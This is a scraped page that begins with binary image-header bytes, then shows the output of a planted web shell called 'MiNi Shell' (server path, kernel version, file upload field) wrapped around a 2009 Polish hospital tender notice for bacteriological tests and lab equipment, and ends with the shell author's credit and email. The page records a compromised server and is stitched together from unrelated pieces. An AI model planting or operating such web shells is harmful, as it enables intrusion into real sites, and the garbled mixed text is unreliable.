JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090324/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090324/74186-N-2009.html

<p class="kh_header"><b>Bełchatów: Dostawa materiałów bakteriologicznych oraz dzierżawa sprzętu</b><br>
<b>Numer ogłoszenia: 74186 - 2009; data zamieszczenia: 24.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Wojewódzki im. Jana Pawła II , ul. Czapliniecka 123, 97-400 Bełchatów, woj. łódzkie, tel. 044 6358236, faks (0-44) 63 58 208.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-belchatow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów bakteriologicznych oraz dzierżawa sprzętu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamawiający podzielił przedmiot zamówienia na 3 części:
Pakiet nr 1 -     Zakup testów do celów mikrobiologicznych połączonych z dzierżawą      automatycznego  systemu do identyfikacji i oceny lekowrażliwości
1.	Testy do identyfikacji i oceny lekowrażliwości drobnoustrojów  hodowanych w moczu - 3600 szt. (1200/rok)
2.	Testy do identyfikacji i oceny lekowrażliwości drobnoustrojów z rodziny Enterobacteriaceae - 3600 szt. (1200/rok)
3.	Testy do identyfikacji i oceny lekowrażliwości ziarniaków Gram+ 5400 szt. (1800/rok)  

Pakiet nr 2 -     Materiały bakteriologiczne
1.	Podłoża do posiewów krwi
- podłoże do hodowli bakterii tlenowych i grzybów 300 butelek (36 miesięcy)= 100 butelek/rok
- podłoże do hodowli bakterii tlenowych, beztlenowych i grzybów (w zestawie oba rodzaje podłoży) - 150x2 butelki (36 miesięcy)= 50x2 butelki /rok

2.	Podłoże suche
- bulion tryptozo -sojowy 3000 g (36 miesięcy)= 1000 g/rok
- MacConkey Agar z fioletem - 1500 g (36 miesięcy)=500 g/rok
- Mueller Agar z chloramfenikolem - 1500 g (36 miesięcy)= 500 g/rok 
- Sabouraud Agar z chloramfenikolem - 1500 g (36 miesięcy) = 500 g/rok

Pakiet nr 3 -     Testy do szybkiej identyfikacji 
1.  Slidex - Rota - Adeno kit  - 600 oznaczeń (200/rok)
2.  RPR test  - 2000 oznaczeń (650/rok)
3.  PYR test do identyfikacji enterokoków  - 1500 oznaczeń (500/rok)

Szczegółowy opis przedmiotu zamówienia określa Rozdział XVIII SIWZ.
Zamawiający dopuszcza możliwości składania ofert częściowych na wybrany(e) pakiet(y).

  2.  W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego, Wykonawca zobowiązany jest złożyć wraz z ofertą  następujące dokumenty:
1)  opis techniczny aparatu (np.: folder, katalog, prospekty itp.) - dot. Pakietu nr 1
2) formularz parametrów techniczno-funkcjonalnych aparatu (wg załączonego   
wzoru druku - Załącznik nr 5) - dot. Pakietu nr 1
3) zaświadczenia podmiotu uprawnionego do kontroli jakości potwierdzającego, 
że dostarczone produkty odpowiadają określonym normom lub specyfikacją   
technicznym, tj. certyfikat CE lub deklarację zgodności - zgodnie z klasyfikacją      
oferowanych wyrobów, a także zgłoszenie lub wpis do rejestru wyrobów medycznych (jeżeli dotyczy oferowanego wyrobu), zgodnie z obowiązującymi przepisami.
 Wykonawca zaznacza na załączonych dokumentach (certyfikatach), których Pakietów/Pozycji dotyczą spośród asortymentu zaoferowanego w przetargu..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.69.40.00-1, 33.12.40.00-6, 33.12.41.30-5, 33.69.65.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się wykonawcy, którzy spełniają warunki określone w art. 22 ust 1 oraz nie podlegają wykluczeniu z udziału 
w postępowaniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004r. - Prawo zamówień publicznych/Dz. U. z 2007r. Nr 223 poz. 1655 ze zmianami/ a ponadto złożą oświadczenia zgodnie z Załącznikiem nr 1 do SIWZ - druk OFERTA i dokumenty wymienione w Rozdz. VI SIWZ.
7.1	Opis warunków udziału w postępowaniu oraz oceny ich spełnienia:
1)	Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności
i nie podlega wykluczeniu na podstawie art. 24 ustawy - Prawo zamówień publicznych.
2)	Wykonawca posiada odpowiednie doświadczenie w wykonywaniu zamówienia   (wymagane co najmniej 2 zrealizowane dostawy).
3)	Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu (system: spełnia/ nie spełnia ) na podstawie załączonych do oferty oświadczeń w trybie art. 44 w związku z art. 22 ust. 1 i 2 ww. ustawy i dokumentów, zgodnie z wymaganiami Zamawiającego określonymi w specyfikacji istotnych warunków zamówienia. Dokumenty wymagane od Wykonawców - Rozdz. VI SIWZ w celu potwierdzenia spełniania warunków udziału w postępowaniu, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów jakich może żądać Zamawiający od Wykonawców oraz form, w jakich te dokumenty mogą być składane par.1 ust. 1 pkt. 2, §1 ust. 2 pkt. 2,  /Dz. U. z 2006r. Nr 87,  poz. 605 oraz  Dz. U. z 2008r. poz. 188, Nr 1155/..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 7.2	Oświadczenia i dokumenty potwierdzające spełnienie warunków udziału                  w postępowaniu
1. Wykonawca zgodnie z art. 44 ustaw - Pzp składa wraz z ofertą oświadczenie
o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 oraz 
o niepodleganiu wykluczeniu z postępowania o zamówienie publiczne na podstawie 
art. 24 ustawy (patrz: druk OFERTA).
2.  W celu potwierdzenia, ze Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 - Prawo zamówień publicznych, wraz z ofertą należy złożyć następujące dokumenty:
1) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie
do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu
do rejestru lub zgłoszenia do ewidencji działalności gospodarczej
wystawiony lub poświadczony pod względem aktualności przez uprawniony organ nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
3. W celu potwierdzenia opisanego przez Zamawiającego warunku posiada przez Wykonawcę 
      niezbędnego doświadczenia, wraz z ofertą należy złożyć następujące dokumenty:
1)	wykaz wykonanych w okresie ostatnich 3 lat przed dniem wszczęcia postępowania
o udzielenie zamówienia co najmniej 2 zamówień na dostawę bonów towarowych, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że dostawy 
te zostały wykonane należycie  (np. opinie, referencje);
4.     Oferta, załączniki i inne wymagane procedurą dokumenty:
1)	druk OFERTA (wg załączonego wzoru druku - Załącznik nr 1 do SIWZ);
2)	druk FORMULARZ CENOWY (wg załączonego wzoru druku - Załącznik nr 2 do SIWZ)
3)	pełnomocnictwo(-a) do reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia albo reprezentowania Wykonawcy w postępowaniu i zawarcia umowy 
w sprawie zamówienia publicznego - udzielone osobom nie wymienionym w dokumencie, o którym mowa w rozdziale VI pkt 2 ppkt 1, a reprezentującym Wykonawcę,
w szczególności poprzez podpisanie/poświadczenie dokumentów składających się na ofertę oraz innych dokumentów składanych w toku postępowania.
5.  Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt. 2 ppkt 1 składa dokument, wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzający, że nie otwarto jego likwidacji ani nie ogłoszono upadłości
6.   Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa w pkt 5 zastępuje się go dokumentem, w zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca  ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpital-belchatow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Wojewódzki im. Jana Pawła II w Bełchatowie, 
97-400 Bełchatów,  ul. Czapliniecka 123
- Sekcja Zamówień Publicznych (pok. nr 92).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.04.2009 godzina 11:00, miejsce: Szpital Wojewódzki im. Jana Pawła II w Bełchatowie, 97-400 Bełchatów, ul. Czapliniecka 123 - sekretariat Z-cy Dyrektora 
ds. Ekonomicznych (pok. nr 18).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1 -     Zakup testów do celów mikrobiologicznych połączonych z dzierżawą      automatycznego  systemu do identyfikacji i oceny lekowrażliwości.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Testy do identyfikacji i oceny lekowrażliwości drobnoustrojów  hodowanych w moczu - 3600 szt. (1200/rok)
2.	Testy do identyfikacji i oceny lekowrażliwości drobnoustrojów z rodziny Enterobacteriaceae - 3600 szt. (1200/rok)
3.	Testy do identyfikacji i oceny lekowrażliwości ziarniaków Gram+ 5400 szt. (1800/rok).</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.30-5, 33.12.40.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2 -     Materiały bakteriologiczne.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Podłoża do posiewów krwi
- podłoże do hodowli bakterii tlenowych i grzybów 300 butelek (36 miesięcy)= 100 butelek/rok
- podłoże do hodowli bakterii tlenowych, beztlenowych i grzybów (w zestawie oba rodzaje podłoży) - 150x2 butelki (36 miesięcy)= 50x2 butelki /rok

2.	Podłoże suche
- bulion tryptozo -sojowy 3000 g (36 miesięcy)= 1000 g/rok
- MacConkey Agar z fioletem - 1500 g (36 miesięcy)=500 g/rok
- Mueller Agar z chloramfenikolem - 1500 g (36 miesięcy)= 500 g/rok 
- Sabouraud Agar z chloramfenikolem - 1500 g (36 miesięcy) = 500 g/rok.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.69.40.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3 -     Testy do szybkiej identyfikacji.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.  Slidex - Rota - Adeno kit  - 600 oznaczeń (200/rok)
2.  RPR test  - 2000 oznaczeń (650/rok)
3.  PYR test do identyfikacji enterokoków  - 1500 oznaczeń (500/rok).</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.30-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com